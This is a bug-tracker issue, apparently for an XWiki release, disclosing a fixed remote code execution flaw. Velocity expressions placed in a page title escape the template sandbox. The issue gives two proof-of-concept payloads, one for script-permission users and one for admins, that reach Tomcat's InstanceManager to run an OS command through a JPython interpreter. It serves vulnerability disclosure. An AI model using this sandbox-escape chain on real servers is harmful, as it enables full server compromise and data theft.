Details
-
Bug
-
Resolution: Fixed
-
Major
-
17.0.0-rc-1
-
Unit
-
Easy
-
N/A
-
N/A
-
Description
A Remote Code Execution (RCE) vulnerability exists due to improper handling of user-supplied input within the page title parameter when creating a page by an authenticated user with script permissions, which is processed by the Apache Velocity template engine.
The application dynamically injects the page title value into a Velocity template . As a result, an attacker can inject arbitrary Velocity expressions or malicious template syntax that will be evaluated on the server side and bypass the sandbox of velocity
By crafting a specially designed payload , the attacker can execute arbitrary commands on the underlying operating system with the privileges of the web application. This can lead to full compromise of the affected server, data exfiltration, or lateral movement within the network.
Payloads :
For any user with script permission :
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
For Admin :
$request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Attachments
Issue Links
- is caused by
-
XCOMMONS-2963 Upgrade to Servlet 5.0
-
- Closed
-
- is duplicated by
-
-
- Closed
-
- links to